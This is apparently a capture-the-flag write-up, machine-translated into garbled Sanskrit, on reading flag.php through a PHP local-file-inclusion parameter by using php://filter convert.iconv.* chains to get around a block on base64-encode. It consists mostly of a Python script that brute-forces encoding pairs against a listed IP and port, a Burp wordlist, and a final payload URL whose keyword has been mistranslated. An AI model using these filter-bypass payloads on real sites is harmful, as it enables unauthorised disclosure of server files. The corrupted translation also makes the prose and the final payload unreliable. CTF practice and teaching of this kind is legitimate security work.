2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
रूपान्तरण फ़िल्टर आधिकारिक दस्तावेजीकरण: https://www.php.net/manual/zh/filters.convert.php#filters.convert.iconv
अयं प्रश्नः convert.base64-encode इत्यस्य कारणेन फ़िल्टर कृतः, अतः convert.iconv.* फ़िल्टरस्य उपयोगः कृतः ।
सक्रियकरणम् iconv भवान् परिसरस्य अधः convert.iconv.* संपीडन-छिद्रकस्य उपयोगं कर्तुं शक्नोति, यत् उपयोगस्य बराबरम् अस्तिiconv() २. २. सर्वाणि स्ट्रीमिंग् डाटा संसाधयन्तु। एतत् फ़िल्टर पैरामीटर्स् समर्थयति न, परन्तु input/output एन्कोडिंग् नाम फ़िल्टर नाम निर्मातुं उपयोक्तुं शक्यते, यथा convert.iconv ।<input-encoding> .<output-encoding> अथवा convert.iconv.<input-encoding> / .<output-encoding> (उभयोः लेखनविधियोः अर्थशास्त्रं समानम्)।
समुचितं एन्कोडिंग् ब्लास्ट् आउट् कर्तुं स्क्रिप्ट् इत्यस्य प्रत्यक्षं उपयोगं कुर्वन्तु:
- import requests
-
- in_encodings = ['UCS-4*', 'UCS-4BE', 'UCS-4LE*', 'UCS-2', 'UCS-2BE', 'UCS-2LE', 'UTF-32*', 'UTF-32BE*', 'UTF-32LE*', 'UTF-16*', 'UTF-16BE*', 'UTF-16LE*', 'UTF-7', 'UTF7-IMAP', 'UTF-8*', 'ASCII*', 'EUC-JP*', 'SJIS*', 'eucJP-win*', 'SJIS-win*', 'ISO-2022-JP', 'ISO-2022-JP-MS', 'CP932', 'CP51932', 'SJIS-mac', 'SJIS-Mobile#DOCOMO', 'SJIS-Mobile#KDDI', 'SJIS-Mobile#SOFTBANK', 'UTF-8-Mobile#DOCOMO', 'UTF-8-Mobile#KDDI-A', 'UTF-8-Mobile#KDDI-B', 'UTF-8-Mobile#SOFTBANK', 'ISO-2022-JP-MOBILE#KDDI', 'JIS', 'JIS-ms', 'CP50220', 'CP50220raw', 'CP50221', 'CP50222', 'ISO-8859-1*', 'ISO-8859-2*', 'ISO-8859-3*', 'ISO-8859-4*', 'ISO-8859-5*', 'ISO-8859-6*', 'ISO-8859-7*', 'ISO-8859-8*', 'ISO-8859-9*', 'ISO-8859-10*', 'ISO-8859-13*', 'ISO-8859-14*', 'ISO-8859-15*', 'ISO-8859-16*', 'byte2be', 'byte2le', 'byte4be', 'byte4le', 'BASE64', 'HTML-ENTITIES', '7bit', '8bit', 'EUC-CN*', 'CP936', 'GB18030', 'HZ', 'EUC-TW*', 'CP950', 'BIG-5*', "CP{949}", "CP{775}"]
-
- out_codings = in_encodings[:]
- for inenc in in_encodings:
- for outenc in out_codings:
- url = 'http://61.147.171.105:62135/?filename=php://filter/convert.iconv.{}.{}/resource=flag.php'.format(inenc,outenc)
- res = requests.get(url)
- if "flag" in res.text:
- print("inenc is:{},outenc is:{}".format(inenc,outenc))
- print(res.text)
burp blasting कृते अस्य शब्दकोशस्य उपयोगं कुर्वन्तु
- UCS-4*
- UCS-4BE
- UCS-4LE*
- UCS-2
- UCS-2BE
- UCS-2LE
- UTF-32*
- UTF-32BE*
- UTF-32LE*
- UTF-16*
- UTF-16BE*
- UTF-16LE*
- UTF-7
- UTF7-IMAP
- UTF-8*
- ASCII*
- EUC-JP*
- SJIS*
- eucJP-win*
- SJIS-win*
- ISO-2022-JP
- ISO-2022-JP-MS
- CP932
- CP51932
- SJIS-mac
- SJIS-Mobile#DOCOMO
- SJIS-Mobile#KDDI
- SJIS-Mobile#SOFTBANK
- UTF-8-Mobile#DOCOMO
- UTF-8-Mobile#KDDI-A
- UTF-8-Mobile#KDDI-B
- UTF-8-Mobile#SOFTBANK
- ISO-2022-JP-MOBILE#KDDI
- JIS
- JIS-ms
- CP50220
- CP50220raw
- CP50221
- CP50222
- ISO-8859-1*
- ISO-8859-2*
- ISO-8859-3*
- ISO-8859-4*
- ISO-8859-5*
- ISO-8859-6*
- ISO-8859-7*
- ISO-8859-8*
- ISO-8859-9*
- ISO-8859-10*
- ISO-8859-13*
- ISO-8859-14*
- ISO-8859-15*
- ISO-8859-16*
- byte2be
- byte2le
- byte4be
- byte4le
- BASE64
- HTML-ENTITIES
- 7bit
- 8bit
- EUC-CN*
- CP936
- GB18030
- HZ
- EUC-TW*
- CP950
- BIG-5*
- EUC-KR*
- UHC
- ISO-2022-KR
- Windows-1251
- Windows-1252
- CP866
- KOI8-R*
- KOI8-U*
- ArmSCII-8
क्लस्टर बम्ब मोड् चिनुत मया अद्यापि तस्य विस्फोटनं न समाप्तम् अस्ति तथा च इदं उपयोगाय सज्जम् अस्ति ।
dirsearch एकं flag.php स्कैन् कृतवान्, ध्वजः तस्मिन् भवेत्
पेलोड् निर्माणम् : १.
http://61.147.171.105:62135?filename=php://filter/convert.iconv.UTF-8*.UTF-32*/संसाधन=ध्वज.php